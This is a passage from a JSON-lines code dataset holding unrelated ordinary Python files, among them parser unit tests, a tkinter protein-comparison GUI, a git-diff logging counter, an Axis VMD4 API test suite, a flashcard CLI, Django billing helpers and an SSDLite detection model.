{})\r\n\r\n def test_form_json_to_dict_output_real_file_monitor_name_key(self):\r\n \"\"\" All non-null entries should have the monitor_name key\"\"\"\r\n test_file = 'static/monitor_output.json'\r\n test_output = form_json_to_dict(test_file)\r\n\r\n failures = []\r\n for i in test_output:\r\n if i is not None:\r\n if 'monitor_name' not in i.keys():\r\n failures.append(i)\r\n\r\n self.assertEqual(failures, [])\r\n\r\n def test_form_json_to_dict_output_real_file_all_plan_keys(self):\r\n \"\"\" If the monitor maps two plans, they should include the SrvPlan and \r\n WkstPlan keys\r\n \r\n \"\"\"\r\n test_file = 'static/monitor_output.json'\r\n test_output = form_json_to_dict(test_file)\r\n\r\n failures = []\r\n for i in test_output:\r\n if i is not None:\r\n if len(i.keys()) == 3 and ('SrvPlan' not in i.keys() or 'WkstPlan' not 
in i.keys()):\r\n failures.append(i)\r\n\r\n self.assertEqual(failures, [])\r\n\r\n def test_form_json_to_dict_output_real_file_single_plan_keys(self):\r\n \"\"\" If a monitor maps a single plan, it should contain one of the plans\r\n listed in plan_list.\r\n \r\n \"\"\"\r\n plan_list = ['WkstPlan', 'SrvPlan', 'GlbPlan']\r\n test_file = 'static/monitor_output.json'\r\n test_output = form_json_to_dict(test_file)\r\n\r\n failures = []\r\n for i in test_output:\r\n if i is not None:\r\n if len(i.keys()) == 2 and len(set(i.keys()) - set(plan_list)) != 1:\r\n failures.append(i)\r\n\r\n self.assertEqual(failures, [])\r\n\r\n def test_form_json_to_dict_output_real_file_no_plan_keys(self):\r\n \"\"\" If a monitor maps no service plans, the only key should be\r\n 'monitor_name'\r\n \r\n \"\"\"\r\n test_file = 'static/monitor_output.json'\r\n test_output = form_json_to_dict(test_file)\r\n\r\n failures = []\r\n for i in test_output:\r\n if i is not None:\r\n if len(i.keys()) == 1 and list(i.keys())[0] != 'monitor_name':\r\n failures.append(i)\r\n\r\n self.assertEqual(failures, [])\r\n\r\nclass TestFormChopFormDictCleanup(unittest.TestCase):\r\n def test_form_dict_cleanup_output_fake_list(self):\r\n \"\"\" The function should return an empty dict if given an empty list \"\"\"\r\n test_input = []\r\n test_output = form_dict_cleanup(test_input)\r\n\r\n self.assertEqual(test_output, {})\r\n\r\n def test_form_dict_cleanup_output_sample_output(self):\r\n \"\"\" The function should return the appropriate monitors \"\"\"\r\n test_input = sample_output\r\n clean_input = [i for i in test_input if i is not None]\r\n test_input_monitors = [monitor['monitor_name']\r\n for monitor in clean_input if 'monitor_name' in monitor]\r\n\r\n test_output = form_dict_cleanup(test_input)\r\n output_keys = test_output.keys()\r\n\r\n self.assertEqual(set(test_output), set(output_keys))\r\n","sub_path":"python/test/test_formchop_output.py","file_name":"test_formchop_output.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"348710546","text":" \nfrom tkinter import *\nfrom tkinter import filedialog\nfrom threading import Thread\nfrom encoder import EncoderDecoder\n\nclass GUI:\n\n def __init__(self, root): \n\n self.encoder = EncoderDecoder()\n self.root = root\n\n self.left_frame = Frame(root)\n left_frame = self.left_frame\n\n self.right_frame = Frame(root)\n\n self.pdb1_file = StringVar()\n self.pdb2_file = StringVar()\n self.cmo_message = StringVar()\n self.similarity_message = StringVar()\n self.cliquer_sol_message = StringVar()\n self.pdbs_contact_count = StringVar()\n\n self.button_pdb1 = Button(left_frame, text=\"Load first pdb...\", command=self.button_pdb1_callback)\n self.button_pdb2 = Button(left_frame, text=\"Load second pdb...\", command=self.button_pdb2_callback)\n\n self.label_pdb1_name = Label(left_frame, textvariable=self.pdb1_file)\n self.label_pdb2_name = Label(left_frame, textvariable=self.pdb2_file)\n\n\n self.label_pdb1_contact = Label(left_frame, text=\"First pdb contact distance:\")\n self.label_pdb2_contact = Label(left_frame, text=\"Second pdb contact distance:\")\n self.label_pop_size = Label(left_frame, text=\"Population size:\")\n self.label_generation_count = Label(left_frame, text=\"Number of generations:\")\n self.label_mutation_rate = Label(left_frame, text=\"Mutation rate:\")\n self.label_individual_mutation_rate = Label(left_frame, text=\"Individual mutation prob:\")\n self.label_cutpoint = 
Label(left_frame, text=\"Crossover cutpoint count:\")\n\n self.button_get_contact_map_overlap = Button(left_frame, text=\"Generate CMO\", command = self.button_get_contact_map_overlap_callback)\n self.label_get_cmo = Label(left_frame, textvariable = self.cmo_message)\n\n self.vcmd = (left_frame.register(self.validate),\n '%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W')\n\n self.text_pdb1_contact = Entry(left_frame, text=\"First pdb contact distance:\", validate = 'key', validatecommand = self.vcmd)\n self.text_pdb2_contact = Entry(left_frame, text=\"Second pdb contact distance:\", validate = 'key', validatecommand = self.vcmd)\n self.text_pop_size = Entry(left_frame, text=\"Population size:\", validate = 'key', validatecommand = self.vcmd)\n self.text_generation_count = Entry(left_frame, text=\"Number of generations:\", validate = 'key', validatecommand = self.vcmd)\n self.text_mutation_rate = Entry(left_frame, text=\"Mutation rate:\", validate = 'key', validatecommand = self.vcmd)\n self.text_individual_mutation_rate = Entry(left_frame, text=\"Individual mutation_prob:\", validate='key', validatecommand = self.vcmd)\n self.text_cutpoint = Entry(left_frame, text=\"Cutpoint:\", validate='key', validatecommand = self.vcmd)\n\n\n self.left_frame.grid(row=0, column = 0)\n self.button_pdb1.grid(row=0, column=0) \n self.button_pdb2.grid(row=0, column=1)\n\n self.label_pdb1_name.grid(row=1, column=0)\n self.label_pdb2_name.grid(row=1, column=1)\n\n\n\n self.label_pdb1_contact.grid(row=2, column=0, sticky='E')\n self.label_pdb2_contact.grid(row=3, column=0, sticky='E')\n self.label_pop_size.grid(row=4, column=0, sticky='E')\n self.label_generation_count.grid(row=5, column=0, sticky='E')\n self.label_mutation_rate.grid(row=6, column=0, sticky='E')\n self.label_individual_mutation_rate.grid(row=7, column=0, sticky='E')\n self.label_cutpoint.grid(row=8, column=0, sticky='E')\n\n self.text_pdb1_contact.grid(row=2, column=1, sticky='E')\n self.text_pdb2_contact.grid(row=3, column=1, sticky='E')\n self.text_pop_size.grid(row=4, column=1, sticky='E')\n self.text_generation_count.grid(row=5, column=1, sticky='E')\n self.text_mutation_rate.grid(row=6, column=1, sticky='E')\n self.text_individual_mutation_rate.grid(row=7, column=1, sticky='E')\n self.text_cutpoint.grid(row=8, column=1, sticky='E')\n self.button_get_contact_map_overlap.grid(row=9, column=0)\n self.label_get_cmo.grid(row=9, column =1)\n\n \n self.right_frame.grid(row = 0, column = 1)\n self.cmo_node_edge_count = StringVar()\n self.label_cmo_count = Label(self.right_frame, textvariable = self.cmo_node_edge_count)\n self.label_cmo_count.grid(row=0, column = 0)\n self.button_run_cliquer = Button(self.right_frame, text=\"Run cliquerGA\", command = self.run_cliquer_command)\n self.button_run_cliquer.grid(row=1, column=0)\n self.label_cm_count = Label(self.right_frame, textvariable = self.pdbs_contact_count)\n self.label_cm_count.grid(row=2, column=0)\n self.label_similarity = Label(self.right_frame, textvariable = self.similarity_message)\n self.label_similarity.grid(row=4, column=0)\n\n\n\n def run_cliquer_async(self):\n self.sol_size, self.sol = (self.encoder.run_cliquer(\n int(self.text_pop_size.get()),\n int(self.text_generation_count.get()),\n float(self.text_mutation_rate.get()),\n float(self.text_individual_mutation_rate.get()),\n int(self.text_cutpoint.get())\n ))\n\n self.similarity_message.set(\"Similarity = %s\"%str((2*self.sol_size)/(self.pdb1_contact_count+self.pdb2_contact_count)))\n\n\n def run_cliquer_command(self):\n t = 
Thread(target = self.run_cliquer_async)\n t.start()\n\n\n def get_cmo_async(self):\n self.nodes, self.edges, self.pdb1_contact_count, self.pdb2_contact_count = self.encoder.get_cmo(self.pdb1_file.get(), self.pdb2_file.get(), float(self.text_pdb1_contact.get()), float(self.text_pdb2_contact.get()))\n self.cmo_message.set(\"Done with CMO\")\n edge_count = sum([len(x) for x in self.edges.values()])//2\n self.cmo_node_edge_count.set(\"CMO Node count: %s; Edge count: %s\"%(len(self.nodes), edge_count))\n self.pdbs_contact_count.set(\"Contacts: first-%d contacts\\nsecond-%d contacts\"%(self.pdb1_contact_count, self.pdb2_contact_count) )\n\n\n def button_get_contact_map_overlap_callback(self):\n self.similarity_message.set(\"\")\n t = Thread(target=self.get_cmo_async)\n t.start()\n\n def button_pdb1_callback(self):\n self.pdb1_file.set(filedialog.askopenfilename(initialdir = \".\", title=\"Select file\", filetypes = ((\"all files \", \"*.*\"),)))\n\n\n def button_pdb2_callback(self):\n self.pdb2_file.set(filedialog.askopenfilename(initialdir = \".\", title=\"Select file\", filetypes = ((\"all files \", \"*.*\"),)))\n\n @staticmethod\n def validate(action, index, value_if_allowed,\n prior_value, text, validation_type, trigger_type, widget_name):\n \n if text in '0123456789.-+':\n if len(text) == 1:\n return True\n try:\n float(value_if_allowed)\n return True\n except ValueError:\n return False\n else:\n return False\n \n\n\n\nif __name__ == \"__main__\":\n root = Tk()\n gui = GUI(root)\n root.mainloop()\n","sub_path":"cliquer/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":7118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"587811449","text":"from config import Config\nfrom scripts.operations.file_operations import FileOperations\nimport os\nimport glob\nimport re\n\t\t\t\n\n\n#For finding out the number of Log related changes and Non Log related changes from the last 10 changes of the repos\nclass LogVsNlog:\n\n\t#Git log helps in extracting the entire changes in one go\n\tdef gitchanges():\n\t\tpaths = [f\"{Config.datascience}*/\", f\"{Config.nondatascience}*/\"]\n\t\tfor path in paths:\n\t\t\tfor folder in glob.glob(path, recursive = True):\n\t\t\t\treponame = folder.split('/')[-2]\n\t\t\t\tos.system(f\"git --git-dir={folder}.git log -10 -p '*.py' | grep '^[+-]' | grep -Ev '^(--- a/|\\+\\+\\+ b/)'> {Config.logvnlog}{reponame}.txt\")\n\n\t#changes json for adding the data to the final format\n\tdef changesjson():\n\t\tpath = f\"{Config.logvnlog}*.txt\"\n\t\tlogvsnlog_changes = {}\n\t\tfor repo_changes in glob.glob(path, recursive=True):\n\t\t\tlog_lines = []\n\t\t\ttotal_lines, logc = 0, 0\n\t\t\tname = repo_changes.split('/')[-1]\n\t\t\twith open(repo_changes) as rc:\n\t\t\t\tfor line in rc:\n\t\t\t\t\ttotal_lines += 1\n\t\t\t\t\ttemp_line = line[1:].strip()\n\t\t\t\t\tif len(temp_line)!=0:\n\t\t\t\t\t\tregexList = ['^print', 'io\\.', '^trace\\.', '^traceback\\.', 'logging\\.', '^sys\\.stderr\\.write', '.*\\.write']\n\t\t\t\t\t\tfor regex in regexList:\n\t\t\t\t\t\t\ts = re.search(regex,temp_line)\n\t\t\t\t\t\t\tif s:\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tlog_lines.append(temp_line)\n\t\t\t\t\t\t\t\tlogc += 1\n\t\t\t\t\t\t\t\tbreak\n\t\t\tlogvsnlog_changes[name.split('.')[0]] = {'logchanges' : logc, 'nonlogchanges' : total_lines-logc, 'log_lines' : log_lines}\n\t\tFileOperations.json.save_json(logvsnlog_changes, 
f\"{Config.root}{Config.logvnlog}logvsnlog_changes.json\")\n","sub_path":"scripts/logging/logvnlog.py","file_name":"logvnlog.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"216757487","text":"chars = list('|eanriosltumdkhgBcSMjHbKJRvpADVWPLGywfCT Ez-NFOZIxYqUéöäXQá\\'üë.óíø')\nnormalCharByChar = {}\non = 1\noff = 0\nnonchar = [off] * len(chars)\n\nfor char in chars:\n normal = [on if char == char2 else off for char2 in chars]\n normalCharByChar[char] = normal\n\ndef createNormalizr(maxWordLen):\n def normalizeText(text_):\n text = text_.ljust(maxWordLen, '$') # any non char\n normal = [normalCharByChar[char] if char in normalCharByChar else nonchar for char in text]\n return normal\n\n return normalizeText\n","sub_path":"src/normalizr.py","file_name":"normalizr.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"282243509","text":"import threading\nimport time\nimport queue\n\nqueue = queue.Queue()\n\ndef put_data_in_queue():\n for i in range(100):\n queue.put(i)\n\nclass MyThread(threading.Thread):\n def run(self):\n while not queue.empty():\n #sleep_times = queue.get()\n time.sleep(3)\n \n #print(queue.get())\n myCrawler = MyCrawler(\"https://www.aitaotu.com/tag/chizuzhe.html\")\n myCrawler.test1()\n queue.task_done()\n\nclass MyCrawler:\n def __init__(self,seeds):\n print(seeds)\n \n def main_function(self):\n threads_num = 4\n put_data_in_queue()\n while True:\n for i in range(threads_num):\n myThread = MyThread()\n myThread.setDaemon(True)\n myThread.start()\n queue.join()\n time.sleep(3)\n \n def test1(self):\n print(\"1112121\")\n\nif __name__==\"__main__\":\n myCrawler = MyCrawler(\"https://www.aitaotu.com/tag/chizuzhe.html\")\n myCrawler.main_function()\n print('over')\n","sub_path":"src/test_threading2.py","file_name":"test_threading2.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"13049359","text":"\"\"\"Test Axis VMD4 API.\n\npytest --cov-report term-missing --cov=axis.vmd4 tests/test_vmd4.py\n\"\"\"\n\nfrom asynctest import Mock\nimport pytest\n\nfrom axis.applications.vmd4 import Vmd4\n\n\n@pytest.fixture\ndef vmd4() -> Vmd4:\n \"\"\"Returns the vmd4 mock object.\"\"\"\n mock_request = Mock()\n mock_request.return_value = \"\"\n return Vmd4(mock_request)\n\n\ndef test_get_empty_configuration(vmd4):\n \"\"\"Test empty get_configuration\"\"\"\n vmd4._request.return_value = response_get_configuration_empty\n vmd4.update()\n vmd4._request.assert_called_with(\n \"post\",\n \"/local/vmd/control.cgi\",\n json={\n \"method\": \"getConfiguration\",\n \"apiVersion\": \"1.2\",\n \"context\": \"Axis library\",\n },\n )\n\n assert len(vmd4.values()) == 0\n\n\ndef test_get_configuration(vmd4):\n \"\"\"Test get_supported_versions\"\"\"\n vmd4._request.return_value = response_get_configuration\n vmd4.update()\n vmd4._request.assert_called_with(\n \"post\",\n \"/local/vmd/control.cgi\",\n json={\n \"method\": \"getConfiguration\",\n \"apiVersion\": \"1.2\",\n \"context\": \"Axis library\",\n },\n )\n\n assert len(vmd4.values()) == 1\n\n vmd4 = vmd4[\"Camera1Profile1\"]\n assert vmd4.id == \"Camera1Profile1\"\n assert vmd4.name == \"Profile 1\"\n assert vmd4.camera == 1\n assert vmd4.uid == 1\n assert vmd4.triggers == [\n {\n \"type\": \"includeArea\",\n \"data\": [[-0.97, -0.97], [-0.97, 0.97], 
[0.97, 0.97], [0.97, -0.97],],\n }\n ]\n assert vmd4.filters == [\n {\"data\": 1, \"active\": True, \"type\": \"timeShortLivedLimit\"},\n {\"data\": 5, \"active\": True, \"type\": \"distanceSwayingObject\"},\n {\"data\": [5, 5], \"active\": True, \"type\": \"sizePercentage\"},\n ]\n\n\ndef test_get_configuration_error(vmd4):\n \"\"\"Test empty get_configuration.\n\n _request returns an empty dict on error.\n \"\"\"\n vmd4._request.return_value = {}\n vmd4.update()\n vmd4._request.assert_called_with(\n \"post\",\n \"/local/vmd/control.cgi\",\n json={\n \"method\": \"getConfiguration\",\n \"apiVersion\": \"1.2\",\n \"context\": \"Axis library\",\n },\n )\n\n assert len(vmd4.values()) == 0\n\n\nresponse_get_configuration_empty = {\n \"apiVersion\": \"1.4\",\n \"method\": \"getConfiguration\",\n \"context\": \"Axis library\",\n \"data\": {\n \"cameras\": [{\"id\": 1, \"rotation\": 0, \"active\": True}],\n \"configurationStatus\": 26,\n \"profiles\": [],\n },\n}\n\n\nresponse_get_configuration = {\n \"apiVersion\": \"1.4\",\n \"method\": \"getConfiguration\",\n \"context\": \"Axis library\",\n \"data\": {\n \"cameras\": [{\"id\": 1, \"rotation\": 0, \"active\": True}],\n \"configurationStatus\": 2,\n \"profiles\": [\n {\n \"filters\": [\n {\"data\": 1, \"active\": True, \"type\": \"timeShortLivedLimit\"},\n {\"data\": 5, \"active\": True, \"type\": \"distanceSwayingObject\"},\n {\"data\": [5, 5], \"active\": True, \"type\": \"sizePercentage\"},\n ],\n \"camera\": 1,\n \"triggers\": [\n {\n \"type\": \"includeArea\",\n \"data\": [\n [-0.97, -0.97],\n [-0.97, 0.97],\n [0.97, 0.97],\n [0.97, -0.97],\n ],\n }\n ],\n \"name\": \"Profile 1\",\n \"uid\": 1,\n }\n ],\n },\n}\n\nresponse_get_configuration_error = {\n \"apiVersion\": \"1.1\",\n \"method\": \"getConfiguration\",\n \"context\": \"Axis library\",\n \"error\": {\n \"code\": \"2000\",\n \"message\": \"The requested version of the application is not supported.\",\n },\n}\n\n","sub_path":"tests/applications/test_vmd4.py","file_name":"test_vmd4.py","file_ext":"py","file_size_in_byte":3833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"14910450","text":"from db import DBWorker\n\n\nclass Memo:\n def menu_constructor(self):\n main_menu = Menu('main', back=True)\n add_menu = Menu('add', master=main_menu, back=True)\n\n main_add = Menu('Add flashcards', callback=add_menu)\n main_practice = Menu('Practice flashcards', master=main_menu, callback=Flashcards.practice)\n main_exit = Menu('Exit', callback=self.exit_)\n\n add_menu_add = Menu('Add a new flashcard', master=add_menu, callback=Flashcards.add_new)\n add_menu_exit = Menu('Exit', callback=main_menu)\n\n main_menu.add_options(main_add, main_practice, main_exit)\n add_menu.add_options(add_menu_add, add_menu_exit)\n\n main_menu()\n\n @staticmethod\n def exit_() -> None:\n print('Bye!')\n exit()\n\n\nclass Menu:\n def __init__(self, name: str, options: list = None, master=None, callback=None, back: bool = False) -> None:\n self.options = options if options is not None else []\n self.name = name\n self.master = master\n self.callback = callback\n self.back = back\n\n def __call__(self) -> None:\n if self.callback:\n if isinstance(self.callback, (list, tuple)):\n self.callback[0](*self.callback[1::])\n elif callable(self.callback):\n self.callback()\n else:\n raise ValueError(\"Callback is not a list, tuple or callable\")\n if self.options:\n for i, option in enumerate(self.options, start=1):\n print(f\"{i}. 
{option.name}\")\n allowed = tuple(str(i) for i in range(1, len(self.options) + 1))\n user_choice = check_input(proper_values=allowed, message='is not an option', back=self.back)\n if not user_choice:\n self()\n self.options[int(user_choice) - 1]()\n if self.master:\n self.master()\n\n def add_options(self, *options):\n self.options += options\n\n\nclass Flashcards:\n @staticmethod\n def add_new() -> None:\n question, answer = None, None\n while not question:\n question = input('Question:\\n')\n while not answer:\n answer = input('Answer:\\n')\n DBWorker.add(question, answer)\n\n @staticmethod\n def practice() -> None:\n rows = DBWorker.get_all()\n if not rows:\n print('There is no flashcard to practice!')\n return\n\n for row in rows:\n allowed = ('y', 'n', 'u')\n input_text = 'press \"y\" to see the answer:\\npress \"n\" to skip:\\npress \"u\" to update:\\n'\n print('Question:', row.question)\n user_choice = check_input(input_text, proper_values=allowed, message='is not an option')\n if user_choice == 'u':\n Flashcards.change(row)\n continue\n elif user_choice == 'y':\n print('Answer:', row.answer, '\\n')\n\n Flashcards.learning(row)\n\n @staticmethod\n def learning(row):\n allowed = ('y', 'n')\n input_text = 'press \"y\" if your answer is correct:\\npress \"n\" if your answer is wrong:\\n'\n user_choice = check_input(input_text, proper_values=allowed, message='is not an option')\n if user_choice == 'y':\n DBWorker.session(row, row.session + 1)\n else:\n DBWorker.session(row, 1)\n\n @staticmethod\n def change(row):\n allowed = ('d', 'e')\n input_text = 'press \"d\" to delete the flashcard:\\npress \"e\" to edit the flashcard:\\n'\n user_choice = check_input(input_text, proper_values=allowed, message='is not an option')\n if user_choice == 'e':\n Flashcards.edit(row)\n if user_choice == 'd':\n DBWorker.delete(row)\n\n @staticmethod\n def edit(row):\n print('current question:', row.question)\n question = input('please write a new question:\\n')\n if not question:\n question = row.question\n print('current answer:', row.answer)\n answer = input('please write a new answer:\\n')\n if not answer:\n answer = row.answer\n DBWorker.edit(row, question, answer)\n\n\ndef check_input(*args, proper_values: tuple = None, message: str = None, back: bool = False, **kwargs):\n if proper_values is None:\n raise ValueError()\n while True:\n raw = input(*args, **kwargs)\n if raw not in proper_values:\n if message:\n print(raw, message)\n if back:\n return\n else:\n return raw\n\n\nif __name__ == '__main__':\n Memo().menu_constructor()\n","sub_path":"tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"61714640","text":"from myproject.student.models import *\nfrom myproject.bill.models import *\nimport locale\nfrom django.db.models import Max,Sum\n\nimport random\n\ndef getrandom(k):\n u = ''\n for m in range(1):\n k = random.randint(1,k)\n u += str(k)\n return u\n\n\ndef printbill(admno,session,term):\n bill_list = []\n studata = Student.objects.get(admitted_session = session, admissionno = admno, gone = False)\n varrid2 = 0\n getaddbill = ''\n billlist = []\n klass = studata.admitted_class\n st=studata.dayboarding\n\n if tblbill.objects.filter(klass = klass, term = term, dayboarding = st).count() == 0:\n varrid = 0\n else:\n getbill = tblbill.objects.filter(klass = klass, term = term, dayboarding = st)\n varrid1 = tblbill.objects.filter(klass = klass, term = term, dayboarding = 
st).aggregate(Sum('billamount'))\n varrid = varrid1['billamount__sum']\n for j in getbill:\n billdic = {'desc': j.desc,'billamount': j.billamount}# locale.format('%.2f', j.billamount, grouping = True) }\n billlist.append(billdic)\n\n if tbladditionalbill.objects.filter(session = session, admissionno = admno, klass = klass, term = term).count() == 0:\n varrid2 = 0\n getaddbill = ''\n else:\n getaddbill = tbladditionalbill.objects.filter(session = session, admissionno = admno, klass = klass, term = term)\n varrid11 = tbladditionalbill.objects.filter(session = session, admissionno = admno, klass = klass, term = term).aggregate(Sum('billamount'))\n varrid2 = varrid11['billamount__sum']\n for h in getaddbill:\n billdic = {\n 'desc': h.desc,\n 'billamount': h.billamount }# locale.format('%.2f', h.billamount, grouping = True) }\n billlist.append(billdic)\n\n varrid = varrid + varrid2\n\n billdic = {\n 'student': st,\n 'bill': billlist,\n 'totalbill': varrid } # locale.format('%.2f', varrid, grouping = True) }\n bill_list.append(billdic)\n\n #return bill_list\n return locale.format('%.0f', varrid)\n\n\n\n","sub_path":"bill/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"164745443","text":"import datetime\nimport importlib\nfrom decimal import Decimal\n\nfrom django.core.serializers.json import DjangoJSONEncoder\n\n\ndef load_class(path):\n try:\n module_path, _, class_name = path.rpartition(\".\")\n module = importlib.import_module(module_path)\n return getattr(module, class_name)\n except AttributeError:\n raise ImportError(\"Module '%s' doesn't have a class named '%s'.\" % (\n module_path, class_name,\n ))\n\n\ndef load_middleware(path_or_obj):\n if isinstance(path_or_obj, str):\n return load_class(path_or_obj)()\n return path_or_obj\n\nclass DateDecimalJSONEncoder(DjangoJSONEncoder):\n def default(self, o):\n if isinstance(o, Decimal):\n return float(o)\n if isinstance(o, datetime.datetime) or isinstance(o, datetime.date):\n return o.isoformat()\n return super().default(o)\n","sub_path":"django_dramatiq/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327064101","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\n\nfrom module.model.mobilenet import mobilenet_v2,mobilenet_v2_075, mobilenet_v2_050,mobilenet_v2_025\nfrom module.functions import PriorBox\nfrom module.loss import L2Norm,MultiBoxLoss\n\n\nimport os\n\n\n\n\nclass SSDLite(nn.Module):\n \"\"\"Single Shot Multibox Architecture for embedded systems\n See: https://arxiv.org/pdf/1512.02325.pdf & \n https://arxiv.org/pdf/1801.04381.pdf for more details.\n\n Args:\n phase: (string) Can be \"eval\" or \"train\" or \"feature\"\n base: base layers for input\n extras: extra layers that feed to multibox loc and conf layers\n head: \"multibox head\" consists of loc and conf conv layers\n feature_layer: the feature layers for head to loc and conf\n num_classes: num of classes \n \"\"\"\n\n def __init__(self, cfg,base, extras, head, feature_layer, priorbox,num_classes):\n super(SSDLite, self).__init__()\n self.priorbox = priorbox\n with torch.no_grad():\n 
self.priors = self.priorbox.forward()\n self.num_classes = num_classes\n # SSD network\n self.base = nn.ModuleList(base)\n self.norm = L2Norm(feature_layer[1][0], 20)\n self.extras = nn.ModuleList(extras)\n\n self.loc = nn.ModuleList(head[0])\n self.conf = nn.ModuleList(head[1])\n self.softmax = nn.Softmax(dim=-1)\n\n self.feature_layer = feature_layer[0]\n self.criterion = MultiBoxLoss(cfg, self.priors)\n \n\n def forward(self, x, targets=None,phase='train'):\n \"\"\"Applies network layers and ops on input image(s) x.\n\n Args:\n x: input image or batch of images. Shape: [batch,3,300,300].\n\n Return:\n Depending on phase:\n test:\n Variable(tensor) of output class label predictions,\n confidence score, and corresponding location predictions for\n each object detected. Shape: [batch,topk,7]\n\n train:\n list of concat outputs from:\n 1: confidence layers, Shape: [batch*num_priors,num_classes]\n 2: localization layers, Shape: [batch,num_priors*4]\n\n feature:\n the feature maps of the feature extractor\n \"\"\"\n sources = list()\n loc = list()\n conf = list()\n\n # apply bases layers and cache source layer outputs\n for k in range(len(self.base)):\n x = self.base[k](x)\n if k in self.feature_layer:\n if len(sources) == 0:\n s = self.norm(x)\n sources.append(s)\n else:\n sources.append(x)\n\n # apply extra layers and cache source layer outputs\n for k, v in enumerate(self.extras):\n x = F.relu(v(x), inplace=True)\n sources.append(x)\n # if k % 2 == 1:\n # sources.append(x)\n\n if phase == 'feature':\n return sources\n\n # apply multibox head to source layers\n for (x, l, c) in zip(sources, self.loc, self.conf):\n loc.append(l(x).permute(0, 2, 3, 1).contiguous())\n conf.append(c(x).permute(0, 2, 3, 1).contiguous())\n loc = torch.cat([o.view(o.size(0), -1) for o in loc], 1)\n conf = torch.cat([o.view(o.size(0), -1) for o in conf], 1)\n\n if phase == 'eval':\n output = (\n loc.view(loc.size(0), -1, 4), # loc preds\n self.softmax(conf.view(-1, self.num_classes)), # conf preds\n )\n elif phase == 'train':\n output = (\n loc.view(loc.size(0), -1, 4),\n conf.view(conf.size(0), -1, self.num_classes),\n )\n loss_l, loss_c = self.criterion(output, targets)\n #print(loss_l.shape,loss_c.shape)\n return loss_l, loss_c\n else:\n output = (\n loc.view(loc.size(0), -1, 4),\n conf.view(conf.size(0), -1, self.num_classes),\n )\n return output\n\ndef add_extras(base, feature_layer, mbox, num_classes):\n extra_layers = []\n loc_layers = []\n conf_layers = []\n in_channels = None\n for layer, depth, box in zip(feature_layer[0], feature_layer[1], mbox):\n if layer == 'S':\n extra_layers += [ _conv_dw(in_channels, depth, stride=2, padding=1, expand_ratio=1) ]\n in_channels = depth\n elif layer == '':\n extra_layers += [ _conv_dw(in_channels, depth, stride=1, expand_ratio=1) ]\n in_channels = depth\n else:\n in_channels = depth\n loc_layers += [nn.Conv2d(in_channels, box * 4, kernel_size=3, padding=1)]\n conf_layers += [nn.Conv2d(in_channels, box * num_classes, kernel_size=3, padding=1)]\n return base, extra_layers, (loc_layers, conf_layers)\n\n# based on the implementation in https://github.com/tensorflow/models/blob/master/research/object_detection/models/feature_map_generators.py#L213\n# when the expand_ratio is 1, the implementation is nearly the same. 
Since the shape always changes, I do not add the shortcut as mobilenetv2 did.\ndef _conv_dw(inp, oup, stride=1, padding=0, expand_ratio=1):\n return nn.Sequential(\n # pw\n nn.Conv2d(inp, oup * expand_ratio, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup * expand_ratio),\n nn.ReLU6(inplace=True),\n # dw\n nn.Conv2d(oup * expand_ratio, oup * expand_ratio, 3, stride, padding, groups=oup * expand_ratio, bias=False),\n nn.BatchNorm2d(oup * expand_ratio),\n nn.ReLU6(inplace=True),\n # pw-linear\n nn.Conv2d(oup * expand_ratio, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n )\n\ndef build_ssd_lite(cfg):\n #base = cfg.MODEL.NETS\n base = mobilenet_v2\n feature_maps = [(19, 19), (10, 10), (5, 5), (3, 3), (2, 2), (1, 1)] \n number_box= [2*len(aspect_ratios) if isinstance(aspect_ratios[0], int) else len(aspect_ratios) for aspect_ratios in cfg.MODEL.ASPECT_RATIOS] \n\n base_, extras_, head_ = add_extras(base(), cfg.MODEL.FEATURE_LAYER,number_box, cfg.MODEL.NUM_CLASSES)\n\n priorbox = PriorBox(image_size=cfg.MODEL.IMAGE_SIZE, feature_maps=feature_maps, aspect_ratios=cfg.MODEL.ASPECT_RATIOS, \n scale=cfg.MODEL.SIZES, archor_stride=cfg.MODEL.STEPS, clip=cfg.MODEL.CLIP)\n return SSDLite(cfg.MATCHER,base_, extras_, head_, cfg.MODEL.FEATURE_LAYER, priorbox,cfg.MODEL.NUM_CLASSES)\n\n\ndef save_checkpoints(model, output_dir, checkpoint_prefix, epochs, iters=None):\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n if iters:\n filename = checkpoint_prefix + '_epoch_{:d}_iter_{:d}'.format(epochs, iters) + '.pth'\n else:\n filename = checkpoint_prefix + '_epoch_{:d}'.format(epochs) + '.pth'\n filename = os.path.join(output_dir, filename)\n torch.save(model.state_dict(), filename)\n with open(os.path.join(output_dir, 'checkpoint_list.txt'), 'a') as f:\n f.write('epoch {epoch:d}: {filename}\\n'.format(epoch=epochs, filename=filename))\n print('Wrote snapshot to: {:s}'.format(filename))\n\n# TODO: write relative cfg under the same page\ndef resume_checkpoint(model,resume_checkpoint, resume_scope):\n if resume_checkpoint == '' or not os.path.isfile(resume_checkpoint):\n print((\"=> no checkpoint found at '{}'\".format(resume_checkpoint)))\n return False\n 